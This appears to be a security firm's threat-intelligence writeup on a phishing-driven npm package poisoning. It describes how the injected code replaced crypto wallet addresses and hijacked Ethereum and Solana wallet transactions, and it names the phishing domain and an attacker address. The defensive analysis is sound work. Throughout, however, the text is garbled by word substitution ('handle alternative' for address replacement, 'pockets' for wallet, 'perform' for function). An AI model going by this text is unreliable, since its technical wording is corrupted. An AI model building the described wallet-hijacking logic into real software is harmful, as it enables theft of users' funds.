Threat Intelligence: Analysis of the Large-Scale NPM Package Poisoning Incident
Key Points of the Attack
The assault originated from a phishing e-mail acquired by developer qix, who reported that the attackers impersonated NPM officers. The e-mail handle used was help[@]npmjs[.]assist.
qix additionally talked about that the e-mail’s topic was “Update Two-Factor Authentication Info”. The e-mail contained a malicious hyperlink:
https[://]www[.]npmjs[.]assist/settings/qix/tfa/manageTfa?motion=setup-totp. Victims clicking “Update 2FA Now” could be redirected to this hyperlink.
Email content material:
https://gist.github.com/Qix-/c1f0d4f0d359dffaeec48dbfa1d40ee9
Currently, this URL (https[://]www[.]npmjs[.]assist) is now not accessible and has been flagged as malicious on VirusTotal.
Discussions amongst different NPM builders present that many additionally acquired related phishing emails, all prompting customers to “replace two-factor authentication data.”
From qix and different builders’ discussions, it’s clear that this assault primarily concerned phishing emails impersonating NPM officers. By tricking victims into updating their 2FA data, attackers took over the accounts and subsequently used the compromised accounts to publish NPM packages containing malicious code.
Analysis Process
Upon analyzing the compromised NPM packages, we recognized extremely obfuscated suspicious code in index.js. After deobfuscation and evaluation, the malicious code’s fundamental objective was to steal customers’ cryptocurrency, primarily by way of handle alternative and transaction hijacking.
Address Replacement
The malicious code’s core logic is in the newdlocal() perform, which performs handle alternative utilizing three sub-functions: f(), f2(), and f4().
f() implements the Levenshtein distance algorithm to measure string similarity. Its aim is to pick the most visually related handle from the attacker’s preset handle pool, changing the unique handle to make sure that the cryptocurrency handle exhibited to the person is swapped with an attacker-controlled handle.
f2() iterates by way of the handle pool, utilizing f() to find out which preset handle is most just like the unique, returning the attacker handle with the highest similarity.
f4() performs the precise alternative. The code first converts object vO to key-value pairs utilizing Object.entries(), then scans for matching addresses. For matched addresses, f4() calls f2() to pick the visually most related attacker handle and substitute the unique. Consequently, customers see the attacker’s handle in the UI, and funds might be stolen if copied instantly for switch.
Variables defined:
- vA, vA2…vA7: attacker’s cryptocurrency handle pool
- vO: regex object containing a number of cryptocurrency handle codecs
Transaction Hijacking
The malicious code’s fundamental logic resides in the runmask() perform. This perform repeatedly screens pockets connection standing utilizing f8(). Once a pockets connection is detected, f7() is triggered to determine pockets hijacking.
f7() makes use of Object.defineProperty() to switch core strategies of window.ethereum (request, ship, sendAsync) with malicious proxy features generated by f6(), whereas backing up unique strategies in a Map object to intercept all pockets interactions.
f6() modifies transaction parameters by calling f5(), relying on the transaction sort:
- eth_sendTransaction: calls f5(…, true) to change transaction parameters
- solana_signTransaction / solana_signAndSendTransaction: calls f5(…, false) to switch public keys and recipient addresses
f5() implements particular parameter alternative logic:
For easy ETH transfers, the recipient handle is changed with 0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976
For sensible contract interactions, it parses the information discipline and replaces handle parameters in frequent perform signatures resembling approve and switch
For different calls, non-attacker addresses are changed with attacker-controlled addresses
For Solana transactions, f5() replaces all addresses in directions.accounts, keys.pubkey, and recipient/vacation spot with 19111111111111111111111111111111
The attacker’s intent behind Solana handle alternative stays unclear.
Conclusion
This assault highlights the extreme dangers posed by phishing emails mixed with social engineering. SlowMist recommends builders stay extremely vigilant concerning e-mail sources and domains, avoiding direct clicks on suspicious hyperlinks. Sensitive operations ought to be carried out by way of official web sites in trusted environments.
Additionally, when constructing and releasing new iterations, builders ought to use dependency model locking. Security or useful updates ought to be utilized by way of inner safety audits, updating locked variations accordingly to stop introducing new dangers.
For extra data on APT intelligence, dependency provide chain assaults, and different safety information, think about using SlowMist’s MistEye Web3 risk intelligence and dynamic safety monitoring software to quickly determine threats and block assaults.
Official Website: https://misteye.io/
Contact: https://www.slowmist.com/contact-us.html
About SlowMist
SlowMist is a blockchain safety agency established in January 2018. The agency was began by a group with over ten years of community safety expertise to develop into a world power. Our aim is to make the blockchain ecosystem as safe as attainable for everybody. We at the moment are a famend worldwide blockchain safety agency that has labored on varied well-known initiatives resembling HashKey Exchange, OSL, MEEX, BGE, BTCBOX, Bitget, BHEX.SG, OKX, Binance, HTX, Amber Group, Crypto.com, and so on.
SlowMist affords a range of companies that embrace however usually are not restricted to safety audits, risk data, protection deployment, safety consultants, and different security-related companies. We additionally supply AML (Anti-money laundering) software program, MistEye (Security Monitoring) , SlowMist Hacked (Crypto hack archives), FireWall.x (Smart contract firewall) and different SaaS merchandise. We have partnerships with home and worldwide corporations resembling Akamai, BitDefender, RC², TianJi Partners, IPIP, and so on. Our in depth work in cryptocurrency crime investigations has been cited by worldwide organizations and authorities our bodies, together with the United Nations Security Council and the United Nations Office on Drugs and Crime.
By delivering a complete safety answer personalized to particular person initiatives, we are able to determine dangers and forestall them from occurring. Our group was capable of finding and publish a number of high-risk blockchain safety flaws. By doing so, we may unfold consciousness and lift the safety requirements in the blockchain ecosystem.
